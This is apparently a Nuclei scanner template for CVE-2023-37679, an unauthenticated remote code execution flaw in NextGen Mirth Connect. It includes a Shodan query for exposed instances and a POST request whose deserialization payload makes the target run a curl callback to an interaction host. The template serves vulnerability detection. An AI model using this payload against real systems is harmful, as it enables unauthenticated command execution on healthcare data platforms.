id: CVE-2023-37679 info: name: NextGen Mirth Connect - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability reference: - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 epss-score: 0.07033 epss-percentile: 0.93304 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" tags: cve2023,cve,nextgen,rce http: - raw: - | GET /api/server/version HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI - | POST /api/users HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI Content-Type: application/xml foo

java.lang.Comparable curl http://{{interactsh-url}}/ start

matchers: - type: dsl dsl: - 'compare_versions(version, "<4.4.1")' - 'contains(interactsh_protocol, "dns")' - 'status_code_1 == 200 && status_code_2 == 500' condition: and extractors: - type: regex part: body_1 name: version group: 1 regex: - '(.*)' internal: true # digest: 4a0a00473045022100ae8a56772a4bdf5d579c5a73fbfb6039c2a9d3907cbd13cc12f77a507b42ac6202204915a2338b893189e1f666a217b8e10ce060bab542e3ecb50151f15b2ff37559:922c64590222798bb761d5b6d8e72950